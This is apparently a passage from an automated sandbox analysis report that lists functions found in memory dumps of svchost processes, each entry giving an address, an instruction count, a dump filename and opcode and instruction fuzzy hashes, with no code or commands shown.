                                                                                                                                                                                                                                              Function 00007FFB4B0E0C3E Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
                                                                                                                                                                                                                                              • Instruction ID: 7e60fb097a4975a02a2652cc2ecb6dce623340afac659744decf2be22ffe98b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28510761A0E7860FE397A73CD8561B57BE1DF8621170940FBD48CC76A3ED189C478351
                                                                                                                                                                                                                                              Function 00007FFB4B0E0538 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bf4025e539d39f598c6c7e490587141e30db6c90c73d29a1478b8cc311ae9c31
                                                                                                                                                                                                                                              • Instruction ID: 0cc56b30bc8717289a2b41a176ade683959d9c500b4a321a06076da3a86e3679
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf4025e539d39f598c6c7e490587141e30db6c90c73d29a1478b8cc311ae9c31
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E31B161B1D9490FE789FA3CD85A279B6C2EF99215F0405BEE44EC32A3DD289C428345
                                                                                                                                                                                                                                              Function 00007FFB4B0E0AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b5d7ac20fda95e1deda8488267098375d9fde92322cf390992115f13e1ed7a08
                                                                                                                                                                                                                                              • Instruction ID: f53afdeddb3419e0027bbc08a21b31206b576d4a5e3f982a9de644441e77ce22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5d7ac20fda95e1deda8488267098375d9fde92322cf390992115f13e1ed7a08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A311AA1B1D9055FE745BBBCD80E3BD77E1EF99302F0442BAE40DC7292DD28580287A2
                                                                                                                                                                                                                                              Function 00007FFB4B0E0985 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 751df08acb7b1fabd867df4483aebbb8b39adb9b15643342832c6e0b0b5cf1a3
                                                                                                                                                                                                                                              • Instruction ID: fc0a153aea171b956a1c2d6916d7fe65edf17757ca182c41ecc127453daada9e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 751df08acb7b1fabd867df4483aebbb8b39adb9b15643342832c6e0b0b5cf1a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31C2B0A18A4E8FEB45EFB8C4566EDB7E1FF98300F5445B8D009D7686DE38A802C750
                                                                                                                                                                                                                                              Function 00007FFB4B0E0868 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c40f8ebea3f93c8db5e7eeb5289f1f1324e50b5dfd256b9751e8b2f08b8372fa
                                                                                                                                                                                                                                              • Instruction ID: 13943a0f921b69e10a6fd9a43b8f2efffbc5b2590ec44cf58d88f308ee648b3f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c40f8ebea3f93c8db5e7eeb5289f1f1324e50b5dfd256b9751e8b2f08b8372fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921B5A154998E8FD341EB6CC0955EABFA1AF96310BA844E5D44CC378BDD28D803C751
                                                                                                                                                                                                                                              Function 00007FFB4B0E1E71 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 81b26c823045f08dbc1d198e6e74281772fd4204c7dcee07dc01ef92fa52509a
                                                                                                                                                                                                                                              • Instruction ID: 73836c14a7bd49d0e0485ffce1cc95d28214a8cb6328f98e7ed7d7d5ed0b2763
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81b26c823045f08dbc1d198e6e74281772fd4204c7dcee07dc01ef92fa52509a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42012691D0DBC55FE786AB389851472BFE0DF92311B0804ABF8C9C62A7EC18A9558392

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F0DF2 Relevance: .6, Instructions: 550COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
                                                                                                                                                                                                                                              • Instruction ID: 3a16d559290b8b7e7fb2f3b188438f8aa1848004a62f9540b19fdd63e62ed293
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731F4A2E1DA8E4FE741BFB8C8A14E97FB0FF81211F4441B6C189D72A3DD582806C380
                                                                                                                                                                                                                                              Function 00007FFB4B0F0E30 Relevance: .5, Instructions: 519COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 898b5185f26855775e94e315a44fe35a81385370a04d259b4b6982196d6c17d2
                                                                                                                                                                                                                                              • Instruction ID: 9b6bc9d53e3fcd1491843ac2756bdeeca530dea9ddd1676441078fb4e03ed243
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 898b5185f26855775e94e315a44fe35a81385370a04d259b4b6982196d6c17d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF21A3A1A1DA8E4FE746AFB8C8A15EA7FB1FF55201F8440A5D589D72E3DD682801C380
                                                                                                                                                                                                                                              Function 00007FFB4B0F12C9 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d24dcd9975d98e00993ef99e76747543601b1a0ef83b2811ee1c18c1f48a2eeb
                                                                                                                                                                                                                                              • Instruction ID: 43e413c8ceb61c0f751d04e20179de0aabf913996f5b1197a24414114211a5b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d24dcd9975d98e00993ef99e76747543601b1a0ef83b2811ee1c18c1f48a2eeb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60719270B28A4D9FE798BB78C4596BD76D6FF88306B404478E54EC32D2DE6CA801C744
                                                                                                                                                                                                                                              Function 00007FFB4B0F0C3E Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a1533705879025c6e7771f56cdc9e1a4c4a96090d490cbaea0b20b71fd71a168
                                                                                                                                                                                                                                              • Instruction ID: 24357c6c648bd7a5a850eb76644d28a02976ed6e9a0d2461bdb741a259afa090
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1533705879025c6e7771f56cdc9e1a4c4a96090d490cbaea0b20b71fd71a168
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E512361B0E68A0FE397AB3CD8555B57BE1DF8722170941FBD48CC72A3EC58AC468352
                                                                                                                                                                                                                                              Function 00007FFB4B0F0AD1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction ID: b146b2384389625c43987c70c9937261856e3920392955cbe504822992d05d04
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF3109A1B1D9094FE745BFBCC80A7BC77E1EF99302F0442BAE50CC3292DD2858028352
                                                                                                                                                                                                                                              Function 00007FFB4B0F0985 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 292d0214d28dbaf032add1b1fc01099f8324b2bad78f1a91647527df2bc07cb0
                                                                                                                                                                                                                                              • Instruction ID: e25bfa82f0d72758fe55262065ed174557831900722b460b8bfb68393e36fe13
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292d0214d28dbaf032add1b1fc01099f8324b2bad78f1a91647527df2bc07cb0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5831CD70A19A0E8FEB45FFB8C4956E9B7E2FF88311F5445B8D009C7296DE38A802C754
                                                                                                                                                                                                                                              Function 00007FFB4B0F0868 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bbedc4039ffae1ad01913f1a058956613be33f411a5c25968428d8fe539b9d16
                                                                                                                                                                                                                                              • Instruction ID: dc333646d6495003c38a1579d87cf365f6a9cd2cf39dd9063f94d7e2686caf93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbedc4039ffae1ad01913f1a058956613be33f411a5c25968428d8fe539b9d16
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921B164A19A4D9FE381FF28C0945E9BBB5EF85325B8040E5D84DC33DACE2C5801C759